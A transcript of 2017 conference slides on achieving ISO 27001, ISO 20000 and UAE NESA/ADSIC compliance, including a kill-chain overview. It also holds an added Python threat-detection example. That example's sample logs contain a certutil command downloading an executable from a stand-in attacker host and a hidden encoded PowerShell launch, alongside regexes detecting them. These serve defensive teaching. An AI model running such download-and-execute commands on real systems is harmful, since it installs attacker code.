TRANSCRIPT
Welcome! Achieving Compliance with ISO 27001,
20000, and UAE IA Standards
José Luis Carrera Jr., CFE, CIA, CRMA
Director of Governance, Risk, and Compliance
DarkMatter LLC
2017 ACFE FRAUD CONFERENCE MIDDLE EAST
THE PALM
DUBAI 29-31 JANUARY 2017
ACHIEVING COMPLIANCE WITH ISO 27001, 20000 AND UAE IA STANDARDS, BUT AVOIDING THE SPEED BUMPS
CONTENTS
01 INTRODUCTION
02 WHO IS DARKMATTER?
03 STANDARDS (ISO 27001, UAE IA, ADSIC)
04 SPEED BUMPS
05 REFERENCES
06 QUESTIONS AND THANK YOU
• This discussion is intended for educational purposes only and does not replace independent
professional judgement in sizing information security governance, risk, and strategy
activities for any given organization. Statements of fact and opinions expressed are those of
the presenter and not DarkMatter LLC AE.
DISCLAIMER
01 INTRODUCTION
• Director; Governance, Risk and Compliance
• Wells Fargo; Compliance Consultant, Technology and Operations
• Cricket Communication; Director of Internal Audit
• EY Bahrain; Executive Director, Risk and Advisory Services
• Agility Defense & Government Services, Chief Audit Executive
• PricewaterhouseCoopers, Senior Manager
• Saudi Aramco, Fraud Division and IT Audit Division
• Arizona State University: Master of Business Administration, International Business and Decision Support Systems
• Arizona State University: Bachelor of Science, Accounting and Computer Information Systems
JOSE LUIS CARRERA JR
02 WHO IS DARKMATTER?
A TRUSTED PARTNER WITH GLOBAL EXPERTISE TO PROVIDE THE ENTIRE SPECTRUM OF CYBERSECURITY SOLUTIONS
ATTACKS ARE GETTING INCREASINGLY COMPLEX AND DAMAGING
GOVERNMENTS AND ENTERPRISES ARE NOT READY TO HANDLE CYBER THREATS
• Nearly two-thirds of organisations do not have well-defined and automated identity & access management programs
• 37% say that real-time insight on cyber risk is not available
• 56% of respondents say it is “unlikely” or “highly unlikely” that their organisation could detect a sophisticated attack (42%: “highly unlikely”)
• 42% of organisations do not have a security operations centre
• 35–45% of respondents rated themselves “still a lot to improve”
• 43% of organisations’ total information security budget will stay the same in the coming 12 months
• 53% of organisations say that lack of skilled resources is one of the main obstacles that challenge their information security
WHO WE ARE
• UAE headquartered
• The world’s elite cyber security talent
• Trusted to protect the nation
• Offering the complete portfolio of cyber security solutions
• Driving & developing the next generation of cyber solutions
WE HAVE GATHERED THE WORLD’S BEST TALENT…
• Harshul Joshi, Senior Vice President, Cyber Governance, Risk & Compliance
• Stephen Brennan, Senior Vice President, Cyber Network Defence
• Eric Eifert, Senior Vice President, Managed Security Services
• Rabih Dabboussi, Senior Vice President, Sales, Marketing & Business Development
• Faisal Al Bannai, Chief Executive Officer
• Samer Khalife, Chief Financial Officer and Executive Vice President, Business Services
…TO ADDRESS THE MOST ADVANCED CYBER THREATS
GOVERNANCE, RISK &COMPLIANCE
CYBER NETWORK DEFENCE
MANAGED SECURITY SERVICES
SECURE COMMUNICATIONS
INFRASTRUCTURE & SYSTEM INTEGRATION
SMART SOLUTIONS
PUBLIC KEY INFRASTRUCTURE
PRODUCTS
SOLUTIONS
SERVICES
DARKMATTER CAN SUPPORT COMPLEX NATIONAL CYBER INITIATIVES
Government Secure
Communications
Elite Cyber Academy
Superior Cyber Security Centre
Public Key Infrastructure
Smart City Cyber Security
National Crypto Suite
DarkMatter Research Stands at the Forefront of Cyber Security Innovation as Firm Aims to Secure the
Technologies of the Future
DarkMatter, the international Cyber Security firm headquartered in the UAE, has inaugurated its
research and development programme with the signing of a series of agreements with notable top tier
institutions around the world, and the engagement of PhD-level researchers who have been given
ample opportunities to innovate within the organization.
Source: Zawya, 18th of January 2017. Appeared also in: Al Watan Online, Al Watan Print, Al Bayan Online, Al Bayan Print, Middle East Projects, CPI Financial, Emirates News Gazette, Emirates Press Release, Yahoo, Street Insider, Emirates News Wire, Press Arabia, Qatar Press and Dot Emirates.
Global Ties for Cyber Security
The necessity of strong Cyber Security measures is self-evident from the rising number
of Cyber-Attacks. Digital security firm Gemalto estimates that over 700 million data
records were compromised in 2015. Yahoo disclosed in December 2016 that over one
billion email accounts were hacked in 2013, compromising sensitive user information. A
proliferation of Cyber-Attacks is causing increasing damage to companies, governments
and individuals.
Source: Oman Tribune, 26 of January 2017.
How Will Cyber Security Earnings Stack Up?
“Cyber Security really was not a focus for companies before 2015, we are now seeing a
greater push for security and compliance. Now that we are reading more about IOT
(Internet of Things) being compromised, companies are becoming more aware of
security,” said Jason Ford, chief technology officer of BlackMesh, a Cyber Security and
compliance hosting company.
Source: Yahoo, 25th of January 2017.
03 STANDARDS (ISO 27001, UAE IA, ADSIC)
STANDARDS
SPEED BUMPS
MITIGATION
SUCCESS!
ISO 27001
5 Key MENA Region Digital Banking Trends in 2017
On the back of increasing Cyber Attacks and breaches in international and regional
financial institutions, Cyber Security will, for the first time in the MENA region, emerge
as one of the top priorities for CEOs and Boards of Directors. Financial institutions that
are ahead of the curve and effectively embed Cyber Security into their risk frameworks
will invest significantly in building the right capabilities and governance structures.
These, in turn, will equip them to preemptively address incidents that could potentially
damage their operations as well as reputation.
Source: Wealth Monitor, 25th of January 2017
The ISO 27001 standard was published in October 2005, essentially replacing the old BS 7799-2
standard. ISO 27001 (formally ISO/IEC 27001:2005) is a specification for an
information security management system (ISMS). An ISMS is a framework of policies and
procedures that includes all legal, physical, and technical controls involved in an organization's
information-risk-management processes.
• PDCA, the Plan-Do-Check-Act model, was used in the 2005 edition to structure the processes.
• The 2013 revision (ISO/IEC 27001:2013) no longer mandates PDCA by name and places more
emphasis on measuring and evaluating how well an organization's ISMS is performing.
ISO 27001:2013
AFTER LUNCH QUESTION
• What three (3) things make up information security?
• People, Processes, Technology
• Technology and processes are only as good as the people who use them.
AFTER LUNCH QUESTION
• What is the weakest link in your organization's information security management?
• YOUR RESOURCES ARE THE WEAKEST LINK IN INFORMATION SECURITY
ISO 27001:2013 RECERTIFICATION - DOMAINS
• ISO Recertification
–Findings & recommendations
–Mitigation plan
• Internal Audit
–ISMS governance framework
–Management review meetings
–ISMS framework, methodology, & strategy
–Incident management
–Effectiveness of controls & KPIs
–Documents & records
–Physical security
–Document handling, including classification, labelling, storing, distribution, dissemination
• Risk Assessment
–RA update
–SOA update
–Risk treatment plan
–Asset register
–Threats & vulnerability
–Applicable controls
• IS Awareness
–Information security training & awareness
–Information security guidelines
–Best practices
–Do’s & don’ts
RECERTIFICATION - DOMAINS
• Gap Assessment & Control Assessment
–Gap analysis
–State of applicable controls
–Findings & recommendations
–Mitigation plan
• Applicability Analysis
–Identify applicable NESA controls
–Map to standards (ISO controls)
• Roadmap Definition & Control Implementation
–Phased multi-year roadmap
–Support implementation
• ISO Recertification, Internal Audit (RA update, SOA update, risk treatment plan), Risk Assessment, and IS Awareness (information security training & awareness), as on the previous slide
WE HAVE ISMS (PPS) TEMPLATES!
• Acceptable Usage of Information Assets
• Access Control
• Backup
• Business Continuity
• Communication & Operations Management
• Compliance
• Disaster Recovery Business Resumption
• Desktops & Peripherals
• Email & Internet
• Information Exchange
• Information Labelling & Handling
• Information Security Management System
• Mobile Computing
• Non Disclosure Agreements
• Network & Systems
• Personnel Security
• Physical & Environmental Security
• Privacy Policy
• System Development & Maintenance
• User Privilege
• VIP Data Protection
• VIP Logical Access
UAE INFORMATION ASSURANCE STANDARDS
NESA, the National Electronic Security Authority, is a government body tasked with protecting
the UAE’s critical information infrastructure and improving national cybersecurity. To achieve
this, NESA has produced a set of standards and guidance for government entities in critical
sectors. Compliance with these standards is mandatory.
NESA IA STANDARDS
NESA IA STANDARDS
There are 188 controls: 60 are management controls and 128 are technical controls. 35 of the management controls are “always applicable,” none of the technical controls are “always applicable.”
NESA IA CONTROLS OVERVIEW
MANAGEMENT CONTROLS
• Strategy and Planning
• Risk Management
• Awareness
• Human Resources
• Compliance
• Performance
TECHNICAL CONTROLS
• Asset Management
• Physical Security
• Operations
• Communications
• Access Control
• Third Parties
• Acquisition
• Incidents Management
• Continuity
NESA IA 15 SECURITY DOMAINS
(Diagram: the ENTITY at the centre, ringed by Security Governance, Security Operations, Physical Security, Third Party Security and Data Management, which group the 15 domains.)
• Management domains: Strategy and Planning; Risk Management; Awareness; Human Resources; Compliance; Performance
• Technical domains: Asset Management; Physical Security; Operations; Communications; Access Control; Third Parties; Acquisition; Incidents Management; Continuity
REALITIES OF MODERN THREATS
• Probe (Reconnaissance)
• Weaponization
• Delivery
• Exploitation
• Installation
• C & C (Command & Control)
• Action
• Reaction
CARRERA “KILL” SEQUENCE
• Probe (Reconnaissance)
• Bad guys' goals
–Find target
–Develop plan of attack based on opportunities for exploit
• Weaponization
• Delivery
• Bad guys' goals
–Place delivery mechanism online
–Use social engineering to induce target to access malware or other exploit
CARRERA “KILL” SEQUENCE
• Exploitation & Installation
• Bad guys' goals
–Exploit vulnerabilities on target systems to acquire access
–Elevate user privileges and install persistence payload
• Command & Control
• Bad guys' goals
–Exfiltrate high-value data as quietly and quickly as possible
–Use compromised system to gain additional access, “steal” computing resources, and/or use in an attack against someone else
• Action
• Reaction
CARRERA “KILL” SEQUENCE
• Probe (Reconnaissance): Intruder selects target, researches it, and attempts to identify vulnerabilities
in the target network.
• Weaponization: Intruder creates remote access malware weapon, such as a virus or worm, tailored to
one or more vulnerabilities.
• Delivery: Intruder transmits weapon to target (e.g., via e-mail attachments, websites or USB drives)
• Exploitation: Malware weapon's program code triggers, which takes action on target network to exploit
vulnerability.
• Installation: Malware weapon installs access point (e.g., "backdoor") usable by intruder.
• Command and Control: Malware enables intruder to have "hands on the keyboard" persistent access to
target network.
• Actions/Reaction: Intruder takes action to achieve their goals, such as data exfiltration, data
destruction, or encryption for ransom.
CARRERA “KILL” SEQUENCE
KILL SEQUENCE MAPPING
• Identify
• Prepare
• Detect
• Respond
• Recover
CARRERAISM RAPID DETECTION MODEL
• COMMON THREAT DETECTION METHODS:
• Traditional tools
• Machine-Readable Threat Intelligence
• Shared INDICATORS OF COMPROMISE (IOCs)
– OpenIOC
• Find the Evil
– IOCbucket.com
• njrat
• Applying Threat Intelligence
DETECT
• COMMON THREAT DETECTION METHODS:
• Next-generation threat detection (behavioral)
• Cb
– Bad guys often repeat behavioral patterns, such as:
• Naming conventions
• Working directories used to copy files
• Methods of using built-in system commands and utilities
• Security analytics
• Service providers
DETECT
• Validate
• To triage an alert and determine whether it is a false positive or a valid threat, analysts can:
– Use leads in the alert (IP addresses, DNS hostnames, machine names)
– Pivot to related information in the SIEM
– Review netflow data and live response data from the suspected endpoints
• Record the time between validation and containment and track this time across incidents as a time-to-contain metric.
• Contain
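Worked example of the detect-validate-contain ideas on these slides, added here and not part of the presentation or of any DarkMatter tooling: a small machine-readable IOC set and three behavioural rules (built-in utility abuse, encoded interpreter launch, execution from a temp directory) are matched against constructed endpoint and proxy log lines, the resulting leads are grouped per host so one SIEM or netflow pivot covers all of them, and the validation-to-containment time is computed as a metric. The IOC values, hostnames, log format, and the validation and containment timestamps are all invented for the example.

```python
"""Added example, not from the presentation: IOC and behavioural matching over
constructed log lines, plus the time-to-contain metric. Every indicator, host
and log line below is made up; the log format is an assumption for this demo."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

BAD_HASH = "ab12" * 16  # placeholder SHA-256, not a real indicator

# Machine-readable IOCs, the shape a shared OpenIOC/STIX feed would provide.
# Keys are the log fields the value is compared against.
IOCS = {
    "dst": {"update-check.example-bad.net"},   # domain seen in proxy logs
    "dst_ip": {"203.0.113.45"},                # documentation range, not a real C2
    "sha256": {BAD_HASH},
}

# Behavioural rules: patterns attackers repeat regardless of the binary they drop
# (built-in utilities, working directories, obfuscated interpreter launches).
BEHAVIOUR_RULES = [
    ("lolbin_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("encoded_powershell", re.compile(r"\bpowershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s", re.I)),
    ("exec_from_temp", re.compile(r"[A-Z]:\\(Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\\S+\.exe", re.I)),
]

@dataclass
class Alert:
    host: str
    ts: datetime
    kind: str       # "ioc" or "behaviour"
    rule: str       # IOC field or behavioural rule name
    lead: str       # the value that fired; the pivot point for triage
    evidence: str   # raw log line kept for the incident record

def parse_line(line):
    """Assumed format: '<ISO-8601 timestamp> <host> key="value" key="value" ...'."""
    ts, host, rest = line.split(" ", 2)
    fields = {k: v for k, v in re.findall(r'(\w+)="([^"]*)"', rest)}
    return datetime.fromisoformat(ts), host, fields

def scan(lines):
    """Return one Alert per IOC hit or behavioural rule hit, in log order."""
    alerts = []
    for line in lines:
        ts, host, f = parse_line(line)
        for key, feed in IOCS.items():                  # exact, case-insensitive IOC match
            val = f.get(key, "").lower()
            if val in feed:
                alerts.append(Alert(host, ts, "ioc", key, val, line))
        cmd = f.get("cmd", "")
        for name, rx in BEHAVIOUR_RULES:                # behavioural match on the command line
            m = rx.search(cmd)
            if m:
                alerts.append(Alert(host, ts, "behaviour", name, m.group(0), line))
    return alerts

def by_host(alerts):
    """Group leads per endpoint so one SIEM/netflow pivot covers all of them."""
    grouped = {}
    for a in alerts:
        grouped.setdefault(a.host, []).append(a)
    return grouped

def time_to_contain(validated_at, contained_at):
    """Minutes from analyst validation to containment; track this per incident."""
    return (contained_at - validated_at) / timedelta(minutes=1)

# Constructed sample: one host showing a download-and-execute chain, one host
# showing only an encoded PowerShell launch, plus benign proxy noise.
SAMPLE_LOGS = [
    '2017-01-30T09:14:02 WS-117 src="proxy" user="jdoe" dst="Update-Check.example-bad.net" dst_ip="203.0.113.45" url="/u.php"',
    '2017-01-30T09:14:05 WS-117 src="edr" user="jdoe" cmd="certutil.exe -urlcache -split -f http://update-check.example-bad.net/u.php C:\\Windows\\Temp\\svch0st.exe"',
    '2017-01-30T09:14:09 WS-117 src="edr" user="jdoe" cmd="C:\\Windows\\Temp\\svch0st.exe" sha256="' + BAD_HASH + '"',
    '2017-01-30T09:20:11 WS-042 src="proxy" user="asmith" dst="www.example.com" dst_ip="198.51.100.7" url="/"',
    '2017-01-30T09:31:40 WS-042 src="edr" user="asmith" cmd="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"',
]

def run_example():
    alerts = scan(SAMPLE_LOGS)
    grouped = by_host(alerts)
    # Assumed incident timeline: analyst validates at 09:40, host isolated at 10:25.
    ttc = time_to_contain(datetime(2017, 1, 30, 9, 40), datetime(2017, 1, 30, 10, 25))
    return {
        "alerts": len(alerts),
        "hosts": sorted(grouped),
        "rules": {h: sorted({a.rule for a in hits}) for h, hits in grouped.items()},
        "ttc_minutes": ttc,
    }

if __name__ == "__main__":
    for host, hits in by_host(scan(SAMPLE_LOGS)).items():
        print(host, [(a.kind, a.rule, a.lead) for a in hits])
    print(run_example())
```

The IOC matches on WS-117 (domain, IP, hash) and the behavioural matches (certutil download, execution from C:\Windows\Temp) corroborate each other, which is what makes that host a valid threat rather than a false positive; WS-042 has a single behavioural lead and no IOC hit, so it is the one that needs the SIEM and netflow pivot before a containment decision. The IOC match is an exact comparison on purpose: substring matching against domains or hashes is a common source of noisy alerts.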
RECOVER
• Memory Analysis
• Volatility 2.4
• Redline
• Network Forensics
• Damballa
• Wireshark
RECOVER
M3 Awareness and Training
MANAGEMENT CONTROL
Control #: M3.1.1 | Control Name: AWARENESS AND TRAINING POLICY | Control Priority: P2
The entity shall develop and maintain an awareness and training policy.
• M3.1.1.1 The awareness and training policy shall be appropriate to the purpose of the entity.
• M3.1.1.2 The awareness and training policy shall provide the framework for setting awareness and training objectives.
• M3.1.1.3 The awareness and training policy shall facilitate the implementation of the associated controls.
• M3.1.1.4 The awareness and training policy shall outline the roles and responsibilities of providers and recipients of awareness and training activities.
T5 Access Control
TECHNICAL CONTROL
T5.1 ACCESS CONTROL POLICY
Control #: T5.1.1 | Control Name: ACCESS CONTROL POLICY | Control Priority: P2
The entity shall establish an access control policy based on business and security requirements.
• T5.1.1.1 The access control policy shall be appropriate to the purpose of the entity.
• T5.1.1.2 The access control policy shall include a statement of the management commitment, purpose, objective and scope of the policy.
• T5.1.1.3 The access control policy shall outline the roles and responsibilities for granting and denying access.
• T5.1.1.4 The access control policy shall provide the framework for the protection of mobile devices against prevailing risks, including user-owned devices.
• T5.1.1.5 The access control policy shall provide the framework to protect information from unauthorized access and grant access to the appropriate users and mobile devices.
• T5.1.1.6 The access control policy shall be documented and communicated to all users.
• T5.1.1.7 The access control policy shall be read and acknowledged formally by all users.
• T5.1.1.8 The access control policy shall be maintained, reviewed, and updated at planned intervals or if significant changes occur.
• In my opinion there are several stages to achieving and maintaining compliance with the
NESA UAE IAS:
• Risk assessment
• Gap assessment and continual audit self-assessment
• Implementation
• Training
• Annual compliance audits
SPEED BUMP AVOIDANCE
ABU DHABI SYSTEMS & INFORMATION CENTRE (ADSIC)
“To develop, drive and support the various initiatives within the Abu Dhabi Government service
transformation programme, the Abu Dhabi Systems & Information Centre (ADSIC) was created
as Committee in October 2005 by Executive Council Decree No. 33, and established as a
Centre in December 2008 by Law No. 18. The Centre is considered as the governmental party
that owns the IT agenda of the Emirate, and has the authority to practice the following
competences:
• Supervise the implementation of the e-Government program in ADGEs.
• Sponsor initiatives and mature assets and competencies that it deems of critical importance
for the e-Government project.
• Propose policies and technology standards for government and relevant entities to achieve
a comprehensive quality in reaching the highest levels of efficiency, confidentiality, and
safety in the e-Government project.
• Issue rules and guidelines regarding the implementation of IT policies and the technical
specifications, and communicate them to all the Government entities.
• Submit the guidelines to the Council regarding the IT sector and the e-Government.
• The mandate translates into the mission of government modernization at large:
• Performance improvement
• Process simplification
• Use of IT”
ADSIC
• Regional
• Leverage standards
• “One piece of evidence, can work for two standards”
• Pssst….39 P1 NESA IA Controls
ADSIC
ISO 20000
ISO/IEC 20000 is a global standard that describes the requirements for an information
technology service management (ITSM) system. The standard was developed to mirror the
best practices described within the IT Infrastructure Library (ITIL) framework.
• ISO/IEC 20000 adopts the PDCA (Plan, Do, Check, Act) Deming lifecycle, like other
ISO norms; this parallels the 7-step continual service improvement (CSI) process in ITIL.
Processes are organized into groups: Service Delivery, Relationship, Resolution, and
Control.
• ISO/IEC 20000 provides strict requirements (the WHAT, Part 1) and a code of practice (the HOW, Part 2).
The story is further expanded by the ITIL experience and best-practice framework as detailed
guidance about processes and functions. At the base are the in-house procedures and
work instructions, from the core business and other implemented standards/methodologies
(ISO, PMI…).
ISO 20000:2011
• ISO 20000 promotes the "adoption of an integrated process approach to effectively deliver
managed services to meet the business and customer requirements."
ISO 20000:2011
• Critical foundation
• Risk assessment
• Organizational business services
• IT service catalogue
• Map business and IT services
• “Lone assets”
• One to many, many to one
SPEED BUMP AVOIDANCE
COMPARISON
04 SPEED BUMPS
• Scope and objective
• Must be defined and agreed upon
• Mitigation of prior internal audits, risk assessments, penetration testing, and/or
vulnerability assessments
• Mitigation should be completed within 12 months, if possible
• Documentation availability and quality of documentation
• Substance versus form
SPEED BUMPS
• Cultural sensitivity
• We live in and work in a multicultural environment
• Service-level and operation-level agreements
• Service-level agreements: key performance indicators
• Operation-level agreements: are “they” meeting expectations?
• “Lost in Translation”
• Frequency of control versus “we’ve done it”
• Evidence, evidence, evidence
SPEED BUMPS
05 REFERENCES
• www.darkmatter.ae
• http://www.iso.org/iso/home.html
• https://adsic.abudhabi.ae/adsic/faces/en/home?_afrLoop=13103778143901525#!%40%40%3F_afrLoop%3D13103778143901525%26_adf.ctrl-state%3D1b7dnt22c7_49
• NIST SP 800-53 Rev. 4: NIST Special Publication 800-53 Revision 4, Security and Privacy Controls for Federal Information Systems and Organizations, April 2013 (including updates as of January 15, 2014). http://dx.doi.org/10.6028/NIST.SP.800-53r4
• NIST SP 800-61 Rev. 2, Computer Security Incident Handling Guide: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
• http://www.fda.gov/MedicalDevices/DeviceRegulationandGuidance/GuidanceDocuments/ucm077812.htm
• PwC, Global State of Information Security Survey: http://www.pwc.com/gx/en/issues/cyber-security/information-security-survey.html
• Control Objectives for Information and Related Technology (COBIT): http://www.isaca.org/COBIT/Pages/default.aspx
• Council on CyberSecurity (CCS) Top 20 Critical Security Controls (CSC): http://www.counciloncybersecurity.org
• ANSI/ISA-62443-2-1 (99.02.01)-2009, Security for Industrial Automation and Control Systems: Establishing an Industrial Automation and Control Systems Security Program: http://www.isa.org/Template.cfm?Section=Standards8&Template=/Ecommerce/ProductDisplay.cfm&ProductID=10243
06 QUESTIONS AND THANK YOU